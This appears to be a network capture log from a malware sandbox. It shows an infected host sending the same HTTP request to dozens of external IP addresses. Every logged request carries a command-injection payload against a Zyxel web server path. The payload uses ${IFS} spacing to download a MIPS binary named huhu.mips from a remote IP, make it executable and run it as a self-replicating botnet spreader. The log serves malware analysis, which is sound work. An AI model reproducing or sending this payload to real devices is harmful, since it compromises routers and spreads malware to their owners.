                                      Jan 19, 2024 17:29:20.547257900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1555192.168.2.1456888172.153.173.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547286987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1556192.168.2.144923618.40.47.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547333002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1557192.168.2.1432852146.231.164.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547364950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1558192.168.2.14426885.160.46.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547399044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1559192.168.2.1442034122.61.190.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547422886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1560192.168.2.144551270.44.171.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547467947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1561192.168.2.1433606181.212.75.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547499895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1562192.168.2.1445226220.109.238.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547522068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1563192.168.2.1439674159.158.211.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547559977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1564192.168.2.1454890168.7.8.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547621012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1565192.168.2.145555667.163.33.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547662973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1566192.168.2.1456524189.184.66.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547691107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1567192.168.2.1458226107.122.181.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547715902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1568192.168.2.1456912101.15.4.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547775984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1569192.168.2.1433198105.4.7.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547791958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1570192.168.2.1443738208.175.99.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547820091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1571192.168.2.1459886192.113.150.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547877073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1572192.168.2.145845498.238.250.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547926903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1573192.168.2.144507847.109.234.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547970057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1574192.168.2.1443448192.96.132.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548028946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1575192.168.2.143808069.211.2.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548074007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1576192.168.2.1441558173.240.73.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548106909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1577192.168.2.145108092.112.11.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548141956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1578192.168.2.1443390157.19.34.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548173904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1579192.168.2.143809448.243.153.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548197031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1580192.168.2.144504264.95.253.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548228025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1581192.168.2.143667446.187.136.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548280954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1582192.168.2.144230812.224.133.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548321009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1583192.168.2.1433608144.181.250.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548365116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1584192.168.2.1434254184.39.183.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548397064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1585192.168.2.1446762108.104.158.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548455000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1586192.168.2.143933450.157.17.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548506975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1587192.168.2.144383843.158.218.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548527956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1588192.168.2.145951260.37.16.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548568010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1589192.168.2.145909485.199.73.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548603058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1590192.168.2.1454202128.133.221.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548648119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1591192.168.2.1450502206.161.74.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548675060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1592192.168.2.1434506163.56.143.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548743963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1593192.168.2.1452102211.159.7.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548774958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1594192.168.2.1448250217.76.154.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548823118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1595192.168.2.1442414176.12.184.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.548866987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1596192.168.2.1434984114.233.49.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552573919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1597192.168.2.144835452.200.220.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552615881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1598192.168.2.1457224218.37.94.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552651882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1599192.168.2.1451250141.179.55.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552712917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1600192.168.2.145572223.3.226.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552737951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1601192.168.2.1444172169.67.107.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552797079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1602192.168.2.14560822.244.122.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552817106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1603192.168.2.1454900140.3.53.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552834988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1604192.168.2.1453390162.49.111.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552897930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1605192.168.2.1433288124.252.216.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552941084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1606192.168.2.146039634.64.218.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.552975893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1607192.168.2.1458388188.24.22.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553010941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1608192.168.2.144993686.233.213.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553061962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1609192.168.2.1440136178.102.106.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553107977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1610192.168.2.1433426147.147.132.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553141117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1611192.168.2.1451728106.234.31.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553184986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1612192.168.2.1437540106.6.235.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553216934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1613192.168.2.1437660203.79.59.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553246975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1614192.168.2.144108876.17.220.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553322077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1615192.168.2.145320839.238.118.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553373098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1616192.168.2.1439474219.134.64.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553396940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1617192.168.2.145402878.211.179.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.553442955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1618192.168.2.1441398187.8.65.106443
                                      TimestampBytes transferredDirectionData
